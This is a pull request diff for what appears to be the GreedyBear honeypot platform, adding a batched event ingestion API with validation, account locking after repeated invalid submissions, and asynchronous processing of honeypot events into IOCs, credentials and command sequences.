### PR TITLE
feat: event ingestion API with asynchronous IOC processing pipeline . Closes #1363

### DIFF
--- a/api/serializers.py
+++ b/api/serializers.py
@@ -3,6 +3,7 @@ import re
 from functools import cache
 
 from django.core.exceptions import FieldDoesNotExist
+from django.utils import timezone
 from rest_framework import serializers
 
 from greedybear.consts import REGEX_DOMAIN
@@ -299,3 +300,40 @@ class SensorCreateSerializer(serializers.ModelSerializer):
         if not is_ip_address(value):
             raise serializers.ValidationError("Invalid IP address")
         return value
+
+
+class EventSerializer(serializers.Serializer):
+    # required fields
+    src_ip = serializers.IPAddressField(required=True)
+    event_type = serializers.CharField(required=True, max_length=100)
+    timestamp = serializers.DateTimeField(required=True)
+    sensor_id = serializers.IntegerField(required=True, min_value=0)
+
+    # optional string fields
+    session_id = serializers.CharField(default="", max_length=100, allow_blank=True)
+    token_id = serializers.CharField(default="", max_length=100, allow_blank=True)
+    protocol = serializers.CharField(default="", max_length=50, allow_blank=True)
+    service_name = serializers.CharField(default="", max_length=100, allow_blank=True)
+    username = serializers.CharField(default="", max_length=255, allow_blank=True)
+    password = serializers.CharField(default="", max_length=255, allow_blank=True)
+    cve_id = serializers.CharField(default="", max_length=50, allow_blank=True)
+    command = serializers.CharField(default="", allow_blank=True)
+    src_port = serializers.IntegerField(default=None, min_value=1, max_value=65535, allow_null=True)
+    dest_port = serializers.IntegerField(default=None, min_value=1, max_value=65535, allow_null=True)
+    related_url = serializers.URLField(default="", max_length=900, allow_blank=True)
+    payload_hash = serializers.CharField(default="", max_length=64, allow_blank=True)
+    data = serializers.JSONField(default=dict)
+
+    def validate_timestamp(self, value):
+        if value > timezone.now():
+            raise serializers.ValidationError("Timestamp cannot be in the future.")
+        return value
+
+
+class InjectionSerializer(serializers.Serializer):
+    events = serializers.ListField(
+        child=EventSerializer(),
+        min_length=1,
+        max_length=10000,
+        error_messages={"min_length": "At least one event is required.", "max_length": "Batch size cannot exceed 10,000 events."},
+    )

--- a/api/urls.py
+++ b/api/urls.py
@@ -8,6 +8,8 @@ from api.views import (
     command_sequence_view,
     cowrie_session_view,
     enrichment_view,
+    event_status_view,
+    events_create_view,
     feeds,
     feeds_advanced,
     feeds_asn,
@@ -43,6 +45,8 @@ urlpatterns = [
     path("news/", news_view),
     path("health/", health_view),
     path("sensor/", sensor_create_view),
+    path("events/", events_create_view),
+    path("event/<str:task_id>/status/", event_status_view),
     # router viewsets
     path("", include(router.urls)),
     # certego_saas:

--- a/api/urls.py
+++ b/api/urls.py
@@ -45,8 +45,8 @@ urlpatterns = [
     path("news/", news_view),
     path("health/", health_view),
     path("sensor/", sensor_create_view),
-    path("events/", events_create_view),
-    path("event/<str:task_id>/status/", event_status_view),
+    path("events/add/", events_create_view),
+    path("events/status/<str:task_id>/", event_status_view),
     # router viewsets
     path("", include(router.urls)),
     # certego_saas:

--- a/api/views/__init__.py
+++ b/api/views/__init__.py
@@ -1,6 +1,7 @@
 from api.views.command_sequence import *
 from api.views.cowrie_session import *
 from api.views.enrichment import *
+from api.views.event import *
 from api.views.feeds import *
 from api.views.health import *
 from api.views.honeypots import *

--- a/api/views/event.py
+++ b/api/views/event.py
@@ -9,7 +9,7 @@ from rest_framework.response import Response
 
 from api.serializers import InjectionSerializer
 from api.views.utils import create_batch_and_events
-from greedybear.models import APISource, EventStatus
+from greedybear.models import APISource, EventStatus, EventStatusType
 
 logger = logging.getLogger(__name__)
 
@@ -66,6 +66,11 @@ def events_create_view(request):
             events_data,
             api_source,
         )
+    except ValueError as e:
+        api_source.invalid_event_count += 1
+        api_source.save(update_fields=["invalid_event_count"])
+        return Response({"error": str(e)}, status=status.HTTP_400_BAD_REQUEST)
+
     except Exception:
         logger.exception("Failed while creating batch & events")
         return Response({"error": "An internal database error occurred while staging events"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@@ -76,12 +81,22 @@ def events_create_view(request):
         batch.save(update_fields=["status", "last_error"])
         return Response({"error": "No valid events could be stored"}, status=status.HTTP_400_BAD_REQUEST)
 
-    # enqueue background task
-    async_task(
-        "greedybear.process_event.process_incoming_event",
-        api_source.id,
-        batch.task_id,
-    )
+    try:
+        # enqueue background task
+        async_task(
+            "greedybear.process_event.process_incoming_event",
+            api_source.id,
+            batch.task_id,
+        )
+    except Exception as e:
+        logger.exception(f"Failed to enqueue background task for batch {batch.task_id}")
+
+        # marking the batch as failed so it doesn't get orphaned in a 'PENDING' state
+        batch.status = EventStatusType.FAILED
+        batch.last_error = f"Background task dispatch failed: {e!s}"
+        batch.save(update_fields=["status", "last_error"])
+
+        return Response({"error": "An internal error occurred while queueing events for processing"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
 
     logger.info(f"[task={batch.task_id}] Accepted {total_created} events — source={api_source.name}")
 
@@ -89,7 +104,7 @@ def events_create_view(request):
         {
             "message": f"{total_created} events accepted for processing",
             "task_id": batch.task_id,
-            "status_url": f"/api/event/{batch.task_id}/status/",
+            "status_url": f"/api/events/status/{batch.task_id}/",
         },
         status=status.HTTP_202_ACCEPTED,
     )

--- a/api/views/event.py
+++ b/api/views/event.py
@@ -1,0 +1,147 @@
+import logging
+
+from certego_saas.apps.auth.backend import CookieTokenAuthentication
+from django_q.tasks import async_task
+from rest_framework import status
+from rest_framework.decorators import api_view, authentication_classes, permission_classes
+from rest_framework.permissions import IsAuthenticated
+from rest_framework.response import Response
+
+from api.serializers import InjectionSerializer
+from api.views.utils import create_batch_and_events
+from greedybear.models import APISource, EventStatus
+
+logger = logging.getLogger(__name__)
+
+
+@api_view(["POST"])
+@authentication_classes([CookieTokenAuthentication])
+@permission_classes([IsAuthenticated])
+def events_create_view(request):
+    """
+    Ingest a batch of raw security events, persist them, and hand off processing to a background task.
+
+    This endpoint validates the payload structure, maps events to a tracking batch, saves
+    them bulk-style to the database to minimize I/O overhead, and offloads heavy parsing
+    (extracting IOCs, usernames, commands, etc.) asynchronously via Django-Q.
+
+    **Authentication:**
+        - Required: CookieTokenAuthentication
+        - User must have an active and valid associated `APISource`.
+
+    **Payload Requirements:**
+        - Content-Type: application/json
+        - Structure: {"events": [ {...event_1...}, {...event_2...} ]}
+        - Batch constraints: Min 1 event, Max 10,000 events per request.
+
+    **Responses:**
+        - `202 Accepted`: Payload verified and successfully queued for background extraction.
+        - `400 Bad Request`: Validation failure or empty event set creation.
+        - `403 Forbidden`: Unauthenticated, missing `APISource`, or locked account state.
+    """
+    try:
+        api_source = request.user.api_source
+    except APISource.DoesNotExist:
+        return Response(
+            {"error": "No APISource linked to your account"},
+            status=status.HTTP_403_FORBIDDEN,
+        )
+
+    if not api_source.is_active:
+        return Response(
+            {"error": "APISource is locked"},
+            status=status.HTTP_403_FORBIDDEN,
+        )
+
+    serializer = InjectionSerializer(data=request.data)
+    if not serializer.is_valid():
+        api_source.invalid_event_count += 1
+        api_source.save(update_fields=["invalid_event_count"])
+        return Response({"error": "Invalid data", "details": serializer.errors}, status=status.HTTP_400_BAD_REQUEST)
+
+    events_data = serializer.validated_data["events"]
+
+    try:
+        batch, total_created = create_batch_and_events(
+            events_data,
+            api_source,
+        )
+    except Exception:
+        logger.exception("Failed while creating batch & events")
+        return Response({"error": "An internal database error occurred while staging events"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
+
+    if total_created == 0:
+        batch.status = "failed"
+        batch.last_error = "No valid events could be stored"
+        batch.save(update_fields=["status", "last_error"])
+        return Response({"error": "No valid events could be stored"}, status=status.HTTP_400_BAD_REQUEST)
+
+    # enqueue background task
+    async_task(
+        "greedybear.process_event.process_incoming_event",
+        api_source.id,
+        batch.task_id,
+    )
+
+    logger.info(f"[task={batch.task_id}] Accepted {total_created} events — source={api_source.name}")
+
+    return Response(
+        {
+            "message": f"{total_created} events accepted for processing",
+            "task_id": batch.task_id,
+            "status_url": f"/api/event/{batch.task_id}/status/",
+        },
+        status=status.HTTP_202_ACCEPTED,
+    )
+
+
+@api_view(["GET"])
+@authentication_classes([CookieTokenAuthentication])
+@permission_classes([IsAuthenticated])
+def event_status_view(request, task_id: str):
+    """
+    Retrieve the execution and processing status of a specific event batch using its task ID.
+
+    This endpoint safely exposes the processing lifecycle phase (e.g., pending, running, success, failed)
+    of an asynchronous background extraction task triggered by Django-Q.
+
+    **Authentication:**
+        - Required: CookieTokenAuthentication
+        - User must have an active, valid associated `APISource`.
+
+    **Path Parameters:**
+        - `task_id` (str): The unique string identifier assigned to the background processing job.
+
+    **Responses:**
+        - `200 OK`: Success payload detailing batch metrics, failure reasons (if any), and state.
+        - `403 Forbidden`: Unauthenticated, missing `APISource`, or locked account state.
+        - `404 Not Found`: No event batch matching the provided `task_id` exists for this account.
+    """
+    try:
+        api_source = request.user.api_source
+    except APISource.DoesNotExist:
+        return Response({"error": "No APISource linked to your account"}, status=status.HTTP_403_FORBIDDEN)
+
+    if not api_source.is_active:
+        return Response(
+            {"error": "APISource is locked"},
+            status=status.HTTP_403_FORBIDDEN,
+        )
+
+    try:
+        batch = EventStatus.objects.get(task_id=task_id, api_source=api_source)
+    except EventStatus.DoesNotExist:
+        return Response({"error": f"No batch found for task_id={task_id}"}, status=status.HTTP_404_NOT_FOUND)
+
+    return Response(
+        {
+            "task_id": batch.task_id,
+            "batch_id": batch.id,
+            "status": batch.status,
+            "ioc_count": batch.ioc_count,
+            "last_error": batch.last_error or None,
+            "processed_at": batch.processed_at,
+            "created_at": batch.created_at,
+        },
+        status=status.HTTP_200_OK,
+    )

--- a/api/views/event.py
+++ b/api/views/event.py
@@ -111,7 +111,7 @@ def event_status_view(request, task_id: str):
     """
     Retrieve the execution and processing status of a specific event batch using its task ID.
 
-    This endpoint safely exposes the processing lifecycle phase (e.g., pending, running, success, failed)
+    This endpoint safely exposes the processing lifecycle phase (e.g., pending, processing, completed, failed)
     of an asynchronous background extraction task triggered by Django-Q.
 
     **Authentication:**

--- a/api/views/event.py
+++ b/api/views/event.py
@@ -75,12 +75,6 @@ def events_create_view(request):
         logger.exception("Failed while creating batch & events")
         return Response({"error": "An internal database error occurred while staging events"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
 
-    if total_created == 0:
-        batch.status = "failed"
-        batch.last_error = "No valid events could be stored"
-        batch.save(update_fields=["status", "last_error"])
-        return Response({"error": "No valid events could be stored"}, status=status.HTTP_400_BAD_REQUEST)
-
     try:
         # enqueue background task
         async_task(

--- a/api/views/event.py
+++ b/api/views/event.py
@@ -8,7 +8,7 @@ from rest_framework.permissions import IsAuthenticated
 from rest_framework.response import Response
 
 from api.serializers import InjectionSerializer
-from api.views.utils import create_batch_and_events
+from api.views.utils import create_batch_and_events, increment_and_evaluate_lock
 from greedybear.models import APISource, EventStatus, EventStatusType
 
 logger = logging.getLogger(__name__)
@@ -55,8 +55,8 @@ def events_create_view(request):
 
     serializer = InjectionSerializer(data=request.data)
     if not serializer.is_valid():
-        api_source.invalid_event_count += 1
-        api_source.save(update_fields=["invalid_event_count"])
+        if lock_response := increment_and_evaluate_lock(api_source):
+            return lock_response
         return Response({"error": "Invalid data", "details": serializer.errors}, status=status.HTTP_400_BAD_REQUEST)
 
     events_data = serializer.validated_data["events"]
@@ -67,8 +67,8 @@ def events_create_view(request):
             api_source,
         )
     except ValueError as e:
-        api_source.invalid_event_count += 1
-        api_source.save(update_fields=["invalid_event_count"])
+        if lock_response := increment_and_evaluate_lock(api_source):
+            return lock_response
         return Response({"error": str(e)}, status=status.HTTP_400_BAD_REQUEST)
 
     except Exception:

--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -700,7 +700,7 @@ def _bulk_create_raw_events(events_data: list[dict], batch: EventStatus, api_sou
 
     Args:
         events_data (list[dict]): A collection of un-persisted, validated event data dictionaries.
-        batch (EventStatus): The tracking tracking batch model instance these events belong to.
+        batch (EventStatus): The tracking batch model instance these events belong to.
         api_source (APISource): The origin provider authority submitting the events.
 
     Returns:
@@ -794,12 +794,14 @@ def increment_and_evaluate_lock(api_source: APISource) -> Response | None:
 
     Returns a 403 Response if locked, otherwise returns None.
     """
-    api_source.invalid_event_count += 1
+    api_source.invalid_event_count = F("invalid_event_count") + 1
+    api_source.save(update_fields=["invalid_event_count"])
+
+    api_source.refresh_from_db()
 
     if api_source.invalid_event_count >= APISOURCE_LOCKED_THRESHOLD:
         api_source.is_active = False
-        api_source.save(update_fields=["invalid_event_count", "is_active"])
+        api_source.save(update_fields=["is_active"])
         return Response({"error": "Your APISource has been automatically locked due to excessive invalid batch submissions."}, status=status.HTTP_403_FORBIDDEN)
 
-    api_source.save(update_fields=["invalid_event_count"])
     return None

--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -4,6 +4,7 @@ import csv
 import hashlib
 import logging
 import urllib.parse
+import uuid
 from datetime import datetime, timedelta
 
 import feedparser
@@ -22,7 +23,7 @@ from stix2 import Bundle, ExternalReference, Indicator
 from api.serializers import FeedsRequestSerializer, parse_feed_types
 from greedybear.consts import CACHE_KEY_GREEDYBEAR_NEWS, CACHE_TIMEOUT_SECONDS, RSS_FEED_URL
 from greedybear.enums import IpReputation
-from greedybear.models import IOC, AutonomousSystem, Honeypot, Sensor, SourceType, Statistics
+from greedybear.models import IOC, AutonomousSystem, EventStatus, Honeypot, RawEvent, Sensor, SourceType, Statistics
 from greedybear.utils import is_ip_address, is_valid_domain
 
 logger = logging.getLogger(__name__)
@@ -686,3 +687,69 @@ def create_or_get_sensor(*, api_source, validated_data):
     )
 
     return sensor, created
+
+
+def _bulk_create_raw_events(events_data, batch, api_source):
+    """
+    Bulk-insert RawEvent rows in chunks
+    Returns the number of rows created.
+    """
+    chunk_size = 1000
+
+    # Prefetch all sensors in one query
+    sensor_ids = {e["sensor_id"] for e in events_data if "sensor_id" in e}
+    sensors_by_id = {s.id: s for s in Sensor.objects.filter(id__in=sensor_ids, api_source=api_source)}
+
+    raw_events = []
+
+    for event in events_data:
+        sensor_id = event.get("sensor_id")
+        sensor = sensors_by_id.get(sensor_id)
+
+        if sensor is None:
+            logger.warning(
+                "sensor_id=%s not found or not owned by api_source=%s",
+                sensor_id,
+                api_source.id,
+            )
+            continue
+
+        # creating a shallow copy (protects the original data from side effects)
+        event_fields = event.copy()
+
+        # safely remove 'sensor_id' so it doesn't break ** unpacking
+        if "sensor_id" in event_fields:
+            del event_fields["sensor_id"]
+
+        raw_events.append(RawEvent(sensor=sensor, batch=batch, **event_fields))
+
+    total = 0
+    try:
+        for i in range(0, len(raw_events), chunk_size):
+            chunk = raw_events[i : i + chunk_size]
+            RawEvent.objects.bulk_create(chunk)
+            total += len(chunk)
+    except Exception:
+        logger.exception(f"Database error during bulk-insert for batch {batch.task_id}")
+        return total
+
+    return total
+
+
+@transaction.atomic
+def create_batch_and_events(events_data, api_source):
+    tracking_id = uuid.uuid4().hex
+
+    batch = EventStatus.objects.create(
+        api_source=api_source,
+        task_id=tracking_id,
+        status="pending",
+    )
+
+    total_created = _bulk_create_raw_events(
+        events_data,
+        batch,
+        api_source,
+    )
+
+    return batch, total_created

--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -21,7 +21,7 @@ from rest_framework.response import Response
 from stix2 import Bundle, ExternalReference, Indicator
 
 from api.serializers import FeedsRequestSerializer, parse_feed_types
-from greedybear.consts import CACHE_KEY_GREEDYBEAR_NEWS, CACHE_TIMEOUT_SECONDS, RSS_FEED_URL
+from greedybear.consts import APISOURCE_LOCKED_THRESHOLD, CACHE_KEY_GREEDYBEAR_NEWS, CACHE_TIMEOUT_SECONDS, RSS_FEED_URL
 from greedybear.enums import IpReputation
 from greedybear.models import IOC, APISource, AutonomousSystem, EventStatus, EventStatusType, Honeypot, RawEvent, Sensor, SourceType, Statistics
 from greedybear.utils import is_ip_address, is_valid_domain
@@ -785,3 +785,21 @@ def create_batch_and_events(events_data: list[dict], api_source: APISource) -> t
         raise
 
     return batch, total_created
+
+
+def increment_and_evaluate_lock(api_source: APISource) -> Response | None:
+    """
+    Increments the failed batch attempts for an APISource and checks if the safety
+    threshold has been reached. If exceeded, it automatically locks the source.
+
+    Returns a 403 Response if locked, otherwise returns None.
+    """
+    api_source.invalid_event_count += 1
+
+    if api_source.invalid_event_count >= APISOURCE_LOCKED_THRESHOLD:
+        api_source.is_active = False
+        api_source.save(update_fields=["invalid_event_count", "is_active"])
+        return Response({"error": "Your APISource has been automatically locked due to excessive invalid batch submissions."}, status=status.HTTP_403_FORBIDDEN)
+
+    api_source.save(update_fields=["invalid_event_count"])
+    return None

--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -23,7 +23,7 @@ from stix2 import Bundle, ExternalReference, Indicator
 from api.serializers import FeedsRequestSerializer, parse_feed_types
 from greedybear.consts import CACHE_KEY_GREEDYBEAR_NEWS, CACHE_TIMEOUT_SECONDS, RSS_FEED_URL
 from greedybear.enums import IpReputation
-from greedybear.models import IOC, AutonomousSystem, EventStatus, Honeypot, RawEvent, Sensor, SourceType, Statistics
+from greedybear.models import IOC, APISource, AutonomousSystem, EventStatus, EventStatusType, Honeypot, RawEvent, Sensor, SourceType, Statistics
 from greedybear.utils import is_ip_address, is_valid_domain
 
 logger = logging.getLogger(__name__)
@@ -689,10 +689,27 @@ def create_or_get_sensor(*, api_source, validated_data):
     return sensor, created
 
 
-def _bulk_create_raw_events(events_data, batch, api_source):
+def _bulk_create_raw_events(events_data: list[dict], batch: EventStatus, api_source: APISource) -> int:
     """
-    Bulk-insert RawEvent rows in chunks
-    Returns the number of rows created.
+    Validates sensor ownership and bulk-inserts raw event payloads into the database.
+
+    This internal utility performs an optimized prefetch lookup of all referenced sensors to
+    ensure they exist and belong to the calling `APISource`. It validates the incoming list
+    upfront to fail fast on foreign or missing sensor identifiers, securely strips the mapping
+    fields to prevent schema mismatch unpacking errors, and stages the data into memory.
+
+    Args:
+        events_data (list[dict]): A collection of un-persisted, validated event data dictionaries.
+        batch (EventStatus): The tracking tracking batch model instance these events belong to.
+        api_source (APISource): The origin provider authority submitting the events.
+
+    Returns:
+        int: The aggregate count of total RawEvent rows successfully inserted into the database.
+
+    Raises:
+        ValueError: If any entry contains a sensor_id that does not exist or is not owned
+                    by the given api_source.
+
     """
     chunk_size = 1000
 
@@ -702,17 +719,14 @@ def _bulk_create_raw_events(events_data, batch, api_source):
 
     raw_events = []
 
+    for e in events_data:
+        sensor_id = e.get("sensor_id")
+        if sensor_id not in sensors_by_id:
+            raise ValueError(f"Invalid or missing sensor_id '{sensor_id}' for api_source {api_source.id}. ")
+
     for event in events_data:
         sensor_id = event.get("sensor_id")
         sensor = sensors_by_id.get(sensor_id)
-
-        if sensor is None:
-            logger.warning(
-                "sensor_id=%s not found or not owned by api_source=%s",
-                sensor_id,
-                api_source.id,
-            )
-            continue
 
         # creating a shallow copy (protects the original data from side effects)
         event_fields = event.copy()
@@ -724,32 +738,50 @@ def _bulk_create_raw_events(events_data, batch, api_source):
         raw_events.append(RawEvent(sensor=sensor, batch=batch, **event_fields))
 
     total = 0
-    try:
-        for i in range(0, len(raw_events), chunk_size):
-            chunk = raw_events[i : i + chunk_size]
-            RawEvent.objects.bulk_create(chunk)
-            total += len(chunk)
-    except Exception:
-        logger.exception(f"Database error during bulk-insert for batch {batch.task_id}")
-        return total
-
+    for i in range(0, len(raw_events), chunk_size):
+        chunk = raw_events[i : i + chunk_size]
+        RawEvent.objects.bulk_create(chunk)
+        total += len(chunk)
     return total
 
 
-@transaction.atomic
-def create_batch_and_events(events_data, api_source):
+def create_batch_and_events(events_data: list[dict], api_source: APISource) -> tuple[EventStatus, int]:
+    """
+    Initializes a tracking batch and executes an atomic bulk-creation of RawEvents.
+
+    Args:
+        events_data (list[dict]): A list of validated event data dictionaries to populate.
+        api_source (APISource): The authenticated origin provider entity submitting the batch.
+
+    Returns:
+        tuple[EventStatus, int]: A tuple containing the created EventStatus tracking model
+                                instance and the integer count of successfully stored events.
+
+    Raises:
+        Exception: Re-raises any underlying database error encountered during the bulk creation
+                  process after writing the crash state metadata.
+    """
     tracking_id = uuid.uuid4().hex
 
     batch = EventStatus.objects.create(
         api_source=api_source,
         task_id=tracking_id,
-        status="pending",
+        status=EventStatusType.PENDING,
     )
+    try:
+        with transaction.atomic():
+            total_created = _bulk_create_raw_events(
+                events_data,
+                batch,
+                api_source,
+            )
+    except Exception as e:
+        logger.exception(f"Database error during bulk-insert for batch {batch.task_id}")
 
-    total_created = _bulk_create_raw_events(
-        events_data,
-        batch,
-        api_source,
-    )
+        # updating the batch status here because it's outside the failed atomic block,
+        batch.status = EventStatusType.FAILED
+        batch.last_error = str(e)
+        batch.save(update_fields=["status", "last_error"])
+        raise
 
     return batch, total_created

--- a/greedybear/consts.py
+++ b/greedybear/consts.py
@@ -65,3 +65,5 @@ CACHE_TIMEOUT_SECONDS = 60 * 60
 
 # tracking application start time
 START_TIME = time.time()
+
+APISOURCE_LOCKED_THRESHOLD = 10

--- a/greedybear/process_event.py
+++ b/greedybear/process_event.py
@@ -9,25 +9,16 @@ from greedybear.cronjobs.extraction.ioc_processor import IocProcessor
 from greedybear.cronjobs.extraction.utils import iocs_from_hits
 from greedybear.cronjobs.repositories import IocRepository, SensorRepository
 from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
-from greedybear.models import CommandSequence, Credential, EventStatus, RawEvent
+from greedybear.models import IOC, CommandSequence, Credential, EventStatus, EventStatusType, RawEvent
 from greedybear.utils import get_attack_type, is_valid_url
 
 logger = logging.getLogger(__name__)
 
 
-def _normalize_raw_event_to_hit(raw):
+def _normalize_raw_event_to_hit(raw: RawEvent) -> dict:
     """
     Convert a RawEvent into the hit-dict format expected by iocs_from_hits.
     """
-    # one bad event shuouldn't crash the whole batch.
-    if not raw.src_ip:
-        logger.warning(f"RawEvent pk={raw.pk} missing src_ip — skipping")
-        return None
-
-    if raw.sensor_id is None:
-        logger.warning(f"RawEvent pk={raw.pk} missing sensor — skipping")
-        return None
-
     hit: dict = {
         "src_ip": raw.src_ip,
         # loaded via a selected_realted
@@ -58,7 +49,7 @@ def _normalize_raw_event_to_hit(raw):
     return hit
 
 
-def _process_credentials(saved_ioc, ip_hits):
+def _process_credentials(saved_ioc: IOC, ip_hits: list[dict]) -> None:
     """
     Linking all credentials data to ioc
     """
@@ -83,7 +74,7 @@ def _process_credentials(saved_ioc, ip_hits):
         logger.debug(f"linked credential '{credential}' → IOC {saved_ioc.name}")
 
 
-def _process_related_urls(saved_ioc, ip_hits):
+def _process_related_urls(saved_ioc: IOC, ip_hits: list[dict]) -> None:
     """
     Extracts, filters, and appends unique related URLs from raw hits to an IOC instance.
 
@@ -104,7 +95,7 @@ def _process_related_urls(saved_ioc, ip_hits):
         logger.debug(f"added {len(to_add)} related_url(s) → IOC {saved_ioc.name}")
 
 
-def _process_commands(ip_hits):
+def _process_commands(ip_hits: list[dict]) -> None:
     """
     Deduplicates and registers order-preserving sequences of executed commands from raw hits.
 
@@ -145,18 +136,21 @@ def _process_commands(ip_hits):
         logger.debug(f"created CommandSequence hash={commands_hash[:12]}…")
 
 
-def process_incoming_event(source_id, task_id):
+def process_incoming_event(source_id: int, task_id: str) -> None:
     """
-    Process a batch of RawEvents into IOCs.
+    Asynchronously processes a tracked batch of RawEvents into refined IOCs.
 
-    Django-Q serializes task args into its DB. Passing N events
-    would bloat the queue. We pass only the batch_id and fetch fresh
-    from DB, faster queue, no serialization overhead.
+    To minimize message broker serialization overhead and avoid queue bloating,
+    this background worker accepts only lookup identifiers (source_id and task_id)
+    and fetches fresh records directly from the database.
 
+    Args:
+        source_id (int): The primary key ID of the associated APISource.
+        task_id (str): The unique hex tracking UUID string of the target EventStatus batch.
 
-    All exceptions are caught and written to EventStatus.last_error.
-    The batch always ends in a terminal state (completed / failed).
-    The finally block guarantees the status is saved even on crash.
+    Raises:
+        Exceptions are caught internally; failure tracebacks are safely written to
+        EventStatus.last_error to preserve background state tracking.
     """
     try:
         batch = EventStatus.objects.get(task_id=task_id)
@@ -164,11 +158,11 @@ def process_incoming_event(source_id, task_id):
         logger.exception(f"[batch={task_id}] EventStatus not found — aborting")
         return
 
-    if batch.status in ["processing", "completed"]:
+    if batch.status in [EventStatusType.PROCESSING, EventStatusType.COMPLETED]:
         logger.warning(f"[task={task_id}] Batch already {batch.status} — skipping to avoid race condition")
         return
 
-    batch.status = "processing"
+    batch.status = EventStatusType.PROCESSING
     batch.ioc_count = 0
     batch.last_error = ""
     batch.save(update_fields=["status", "ioc_count", "last_error"])
@@ -182,12 +176,12 @@ def process_incoming_event(source_id, task_id):
 
         if not raw_events:
             logger.warning(f"[task_id={task_id}] No unprocessed RawEvents — completing")
-            batch.status = "completed"
+            batch.status = EventStatusType.COMPLETED
             batch.processed_at = timezone.now()
             batch.save(update_fields=["status", "ioc_count", "processed_at"])
             return
 
-        logger.info(f"[task={task_id}] {len(raw_events)} RawEvents fetched")
+        logger.debug(f"[task={task_id}] {len(raw_events)} RawEvents fetched")
 
         # normaizing hit dicts
         hits = []
@@ -205,22 +199,22 @@ def process_incoming_event(source_id, task_id):
         if not hits:
             error_msg = f"All {len(raw_events)} RawEvents invalid after normalization"
             logger.error(f"[task={task_id}] {error_msg}")
-            batch.status = "failed"
+            batch.status = EventStatusType.FAILED
             batch.last_error = error_msg
             return
 
-        logger.info(f"[task={task_id}] {len(hits)} valid hits")
+        logger.debug(f"[task={task_id}] {len(hits)} valid hits")
 
         ioc_objects = iocs_from_hits(hits)
 
         if not ioc_objects:
             error_msg = "iocs_from_hits returned 0 IOCs, all source IPs may be non-global or filtered"
             logger.error(f"[task={task_id}] {error_msg}")
-            batch.status = "failed"
+            batch.status = EventStatusType.FAILED
             batch.last_error = error_msg
             return
 
-        logger.info(f"[task_id={task_id}] {len(ioc_objects)} unique IOCs")
+        logger.debug(f"[task_id={task_id}] {len(ioc_objects)} unique IOCs")
 
         # grouping hits by src_ip for post-processing lookup
         hits_by_ip: dict[str, list[dict]] = defaultdict(list)
@@ -256,9 +250,9 @@ def process_incoming_event(source_id, task_id):
                 processed_iocs.append(saved_ioc)
 
             if filtered:
-                logger.info(f"[task={task_id}] {filtered} IOC(s) filtered out")
+                logger.debug(f"[task={task_id}] {filtered} IOC(s) filtered out")
 
-            logger.info(f"[task={task_id}] {len(processed_iocs)} IOC(s) persisted")
+            logger.debug(f"[task={task_id}] {len(processed_iocs)} IOC persisted")
 
             # score
             if processed_iocs:
@@ -267,12 +261,12 @@ def process_incoming_event(source_id, task_id):
 
             RawEvent.objects.filter(batch=batch, processed=False).update(processed=True)
 
-            batch.status = "completed"
+            batch.status = EventStatusType.COMPLETED
             batch.ioc_count = len(processed_iocs)
 
     except Exception as exc:
         logger.exception(f"[task={task_id}] Failed")
-        batch.status = "failed"
+        batch.status = EventStatusType.FAILED
         batch.last_error = str(exc)[:1000]
 
     finally:

--- a/greedybear/process_event.py
+++ b/greedybear/process_event.py
@@ -1,0 +1,281 @@
+import hashlib
+import logging
+from collections import defaultdict
+
+from django.db import transaction
+from django.utils import timezone
+
+from greedybear.cronjobs.extraction.ioc_processor import IocProcessor
+from greedybear.cronjobs.extraction.utils import iocs_from_hits
+from greedybear.cronjobs.repositories import IocRepository, SensorRepository
+from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+from greedybear.models import CommandSequence, Credential, EventStatus, RawEvent
+from greedybear.utils import get_attack_type, is_valid_url
+
+logger = logging.getLogger(__name__)
+
+
+def _normalize_raw_event_to_hit(raw):
+    """
+    Convert a RawEvent into the hit-dict format expected by iocs_from_hits.
+    """
+    # one bad event shuouldn't crash the whole batch.
+    if not raw.src_ip:
+        logger.warning(f"RawEvent pk={raw.pk} missing src_ip — skipping")
+        return None
+
+    if raw.sensor_id is None:
+        logger.warning(f"RawEvent pk={raw.pk} missing sensor — skipping")
+        return None
+
+    hit: dict = {
+        "src_ip": raw.src_ip,
+        # loaded via a selected_realted
+        "_sensor": raw.sensor,
+    }
+
+    if raw.timestamp:
+        hit["@timestamp"] = raw.timestamp.isoformat()
+    if raw.dest_port:
+        hit["dest_port"] = raw.dest_port
+    if raw.username:
+        hit["username"] = raw.username
+    if raw.password:
+        hit["password"] = raw.password
+
+    if raw.username and raw.password:
+        hit["_credential"] = {
+            "username": raw.username,
+            "password": raw.password,
+            "protocol": raw.protocol,
+        }
+
+    if raw.related_url and is_valid_url(raw.related_url):
+        hit["_related_url"] = raw.related_url
+    if raw.command:
+        hit["_command"] = raw.command
+
+    return hit
+
+
+def _process_credentials(saved_ioc, ip_hits):
+    """
+    Linking all credentials data to ioc
+    """
+    for hit in ip_hits:
+        cred = hit.get("_credential")
+        if not cred:
+            continue
+
+        # Credential has a unique constraint on (username, password, protocol).
+        # get_or_create is atomic and race-condition safe , no duplicate rows
+        #  even if two batches submit the same credential simultaneously.
+        credential, _ = Credential.objects.get_or_create(
+            username=cred["username"],
+            password=cred["password"],
+            protocol=cred["protocol"],
+        )
+
+        # Credential.sources is M2M to IOC. One credential can appear across
+        # many attacker IPs; one IOC can have many credentials. add() is
+        # idempotent,calling it twice doesn't create duplicate M2M rows.
+        credential.sources.add(saved_ioc)
+        logger.debug(f"linked credential '{credential}' → IOC {saved_ioc.name}")
+
+
+def _process_related_urls(saved_ioc, ip_hits):
+    """
+    Extracts, filters, and appends unique related URLs from raw hits to an IOC instance.
+
+    Validates that URLs have non-empty paths, deduplicates against existing records
+    to maintain idempotency, and persists changes back to the database.
+    """
+    new_urls = {hit["_related_url"] for hit in ip_hits if hit.get("_related_url") and is_valid_url(hit["_related_url"])}
+    if not new_urls:
+        return
+    # IOC.related_urls is a db ArrayField. We deduplicate against
+    # existing values so re-processing the same batch is safe/idempotent.
+    # using sets makes this O(n) instead of O(n²).
+    existing = set(saved_ioc.related_urls or [])
+    to_add = new_urls - existing
+    if to_add:
+        saved_ioc.related_urls = sorted(existing | to_add)
